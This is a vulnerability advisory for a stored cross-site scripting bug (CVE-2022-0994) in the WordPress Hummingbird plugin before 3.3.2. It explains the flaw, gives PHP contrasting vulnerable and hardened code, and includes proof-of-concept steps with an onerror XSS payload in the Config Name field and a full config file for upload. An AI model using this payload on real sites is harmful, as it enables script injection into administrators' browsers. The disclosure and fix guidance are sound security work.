Authored by Taurus Omar

WordPress Hummingbird plugin versions prior to 3.3.2 suffer from a persistent (stored) cross site scripting vulnerability.

advisories | CVE-2022-0994

Title:
WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

References:
CVE-2022-0994

Author:
Taurus Omar

Description:
The plugin does not sanitise or escape the Config Name, which allows high privilege users, such as admins, to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example on multisite, or where DISALLOW_UNFILTERED_HTML is set), i.e. in exactly the configurations where an admin is not expected to be able to inject script.
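The pattern behind this class of bug, and the two-layer fix, as an added illustration in plain WordPress PHP. This is not Hummingbird's code and not the 3.3.2 patch; the hb_* function names, the table-cell markup and the import routine are assumptions made for the example. Only the WordPress API calls (sanitize_text_field, sanitize_textarea_field, wp_unslash, esc_html, WP_Error) are real.

```php
<?php
// Added illustration, not Hummingbird's own code. Function names are assumed.

// Vulnerable pattern: the stored config name is concatenated straight into
// the admin page. A name of <img src onerror=alert(/XSS/)> therefore becomes
// live markup in the browser of every admin who opens the Configs screen.
function hb_render_config_name_vulnerable( array $config ) {
    return '<td class="config-name">' . $config['name'] . '</td>';
}

// Hardened pattern, layer 1 (input): strip tags and normalise whitespace
// before the value is stored. wp_unslash() undoes WordPress' magic-quotes
// style slashing of request data first.
function hb_sanitize_config_name( $raw ) {
    return sanitize_text_field( wp_unslash( $raw ) );
}

function hb_sanitize_config_description( $raw ) {
    return sanitize_textarea_field( wp_unslash( $raw ) );
}

// Hardened pattern, layer 2 (output): escape for the HTML text context at
// the point of rendering. Doing both means the stored value is clean AND a
// value that arrived by another route (an uploaded config file, a direct
// database write, an older plugin version) is still inert when displayed.
function hb_render_config_name( array $config ) {
    return '<td class="config-name">' . esc_html( $config['name'] ) . '</td>';
}

// The advisory's second PoC path is a config upload. Fixing only the form
// handler leaves that route open, so the import code must run the same
// sanitiser over every free-text field it reads from the file.
function hb_import_config( $json ) {
    $data = json_decode( $json, true );
    if ( ! is_array( $data ) || ! isset( $data['name'] ) ) {
        return new WP_Error( 'hb_bad_config', 'Invalid config file.' );
    }
    $data['name']        = hb_sanitize_config_name( $data['name'] );
    $data['description'] = hb_sanitize_config_description( $data['description'] ?? '' );
    return $data;
}

// Why "Admin+" still matters: the unfiltered_html capability only governs
// what WordPress core strips from post content through wp_kses. A plugin
// that stores its own option and echoes it raw never consults that filter,
// so an administrator who has been denied unfiltered_html (multisite, or
// DISALLOW_UNFILTERED_HTML) can still plant script that runs for everyone.
```

Review checklist for a fix of this kind: every render site of the field is escaped (esc_html for text, esc_attr inside attributes), every write path (form save, import, REST/AJAX handler) sanitises, and the config export keeps the sanitised value so a shared config file cannot carry the payload to another site.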

Affects Plugins:
Hummingbird-performance - Fixed in version 3.3.2

Proof of Concept:
Go to Hummingbird's Settings > Configs, edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save, then click 'Apply' to trigger the XSS.

Alternatively, go to Hummingbird's Settings > Configs and upload the following config file (same payload in the "name" field; this path does not go through the edit form at all):

{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}

Classification:
Type: XSS (Stored)
OWASP Top 10 (2017) A7: Cross-Site Scripting (XSS)
CWE-79

WPScan:
https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a